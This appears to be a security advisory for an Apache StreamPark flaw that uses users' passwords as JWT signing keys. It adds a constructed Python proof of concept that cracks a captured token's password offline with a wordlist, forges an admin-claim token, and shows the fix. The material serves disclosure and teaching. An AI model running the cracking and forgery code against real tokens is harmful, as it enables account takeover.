CVE-2025-53960
Apache StreamPark: Uses the user’s password as the secret key
In short
Apache StreamPark uses each user's password as the secret key that signs that user's authentication tokens (JWTs). Anyone who captures a token can guess the password offline, because every guess can be checked against the token's signature without touching the server; and anyone who already knows the password can mint fake tokens and impersonate that user.
Technical detail
The vulnerability exists in JWT generation: the user's password is used directly as the HMAC signing key (HS256) instead of a dedicated server-side secret. The token's signature therefore becomes a password-equivalent hash. An attacker who captures a JWT (from a proxy log, browser storage, a shared link, or similar) can brute-force the password offline, limited only by the password's strength rather than by any server-side rate limit; an attacker who already knows the password can forge tokens with arbitrary claims for that user, enabling complete account compromise. Affected versions: 2.0.0 through 2.1.6.
Summary generated and translated by AI from the official description.
When issuing JSON Web Tokens (JWT), Apache StreamPark directly uses the user's password as the HMAC signing key (e.g., with the HS256 algorithm). An attacker can exploit this vulnerability to perform offline brute-force attacks on the user's password using a captured JWT, or to arbitrarily forge identity tokens for the user if the password is already known, ultimately leading to complete account takeover.
This issue affects Apache StreamPark: from 2.0.0 before 2.1.7.
Users are recommended to upgrade to version 2.1.7, which fixes the issue.
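The following is an added illustration of the flaw described above and of the fix (a dedicated random secret). It is constructed for this page and is not StreamPark's code: the claim layout, the wordlist and the function names are assumptions, and the HS256 routines are written with the standard library so the example runs offline. It shows the offline password recovery from a captured weak token, the forgery that becomes possible once the password is known, and why neither works once the signing key is a high-entropy server secret.

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import Optional

# Constructed sample wordlist for the demonstration (not from any real breach).
WORDLIST = ["letmein", "password", "streampark2024", "admin123", "hunter2"]


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(payload: dict, key: bytes) -> str:
    """Mint an HS256 JWT: b64url(header).b64url(payload).b64url(HMAC-SHA256(key, header.payload))."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def verify_hs256(token: str, key: bytes) -> Optional[dict]:
    """Return the payload if the signature is valid under `key`, otherwise None."""
    try:
        header, body, sig = token.split(".")
        expected = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(sig)):
            return None
        return json.loads(_b64url_decode(body))
    except (ValueError, UnicodeDecodeError):
        return None


# --- Weak pattern (the CVE): the user's password doubles as the HMAC key ---------

def issue_token_weak(username: str, password: str) -> str:
    # The signing key is derived from nothing but the password, so the token's
    # signature is a password-equivalent hash that can be attacked offline.
    return sign_hs256({"sub": username}, password.encode())


def crack_password_offline(token: str, wordlist) -> Optional[str]:
    """One HMAC per candidate, no server interaction, no lockout, no rate limit."""
    for candidate in wordlist:
        if verify_hs256(token, candidate.encode()) is not None:
            return candidate
    return None


def forge_token_with_known_password(username: str, password: str, extra: dict) -> str:
    """Knowing the password, the attacker mints any claims they like for that user."""
    return sign_hs256({"sub": username, **extra}, password.encode())


# --- Fix: a dedicated, random, per-deployment secret ------------------------------

# Generated once, stored server-side, never derived from user data. 32 bytes meets
# the RFC 7518 minimum key size for HS256 (at least the 256-bit hash output).
SERVER_SECRET = secrets.token_bytes(32)


def issue_token_fixed(username: str) -> str:
    return sign_hs256({"sub": username}, SERVER_SECRET)


def demo() -> dict:
    user, pw = "alice", "streampark2024"  # constructed credentials
    captured = issue_token_weak(user, pw)            # e.g. read from a proxy log
    recovered = crack_password_offline(captured, WORDLIST)
    forged = forge_token_with_known_password(user, recovered, {"role": "admin"})
    accepted = verify_hs256(forged, pw.encode())     # the vulnerable server accepts it
    fixed_token = issue_token_fixed(user)
    return {
        "recovered_password": recovered,
        "forgery_accepted": accepted is not None,
        "fixed_token_crackable": crack_password_offline(fixed_token, WORDLIST) is not None,
    }


if __name__ == "__main__":
    print(demo())
```

The wordlist loop is the whole attack: with the password as the key, each guess costs one HMAC and can be run on captured tokens in bulk, so password quality is the only remaining defence. With a random server secret the token no longer encodes anything derivable from the password, and a token can only be forged by whoever holds the secret. In production use a maintained JWT library rather than hand-rolled HS256, and treat the server secret like any other credential: generated with a CSPRNG, at least 256 bits, and rotated if exposed.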
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N (base score 5.9, Medium: network-reachable with no privileges, but high attack complexity because a token must first be captured or the password must already be known; impact is to confidentiality of the affected account)
Affected products
Apache Software Foundation · Apache StreamPark